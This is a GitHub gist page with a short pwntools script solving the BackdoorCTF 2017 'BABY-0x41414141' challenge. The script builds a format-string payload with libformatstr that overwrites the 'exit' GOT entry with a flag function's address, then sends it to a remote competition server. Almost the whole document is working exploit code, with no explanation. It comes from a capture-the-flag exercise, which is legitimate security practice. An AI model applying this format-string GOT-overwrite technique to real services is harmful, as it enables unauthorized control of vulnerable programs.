Skip to content

Instantly share code, notes, and snippets.

@rhamaa
Forked from 0xPwny/baby.py
Created October 30, 2017 09:24
Show Gist options
  • Save rhamaa/2b9546eb46d2ba7adff19f5915533c81 to your computer and use it in GitHub Desktop.
Save rhamaa/2b9546eb46d2ba7adff19f5915533c81 to your computer and use it in GitHub Desktop.
BackdoorCTF 2017 - PWN - BABY-0x41414141
from pwn import *
from libformatstr import *
file = ELF("./32_new")
flag = 0x0804870b
r = remote("163.172.176.29",9035)
r.recvuntil("name?")
p = FormatStr()
#rop = [file.symbols["system"],0x80488e0]
p[file.got["exit"]] = flag #rop
pld = p.payload(10,0)
r.sendline(pld)
print r.recvall()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment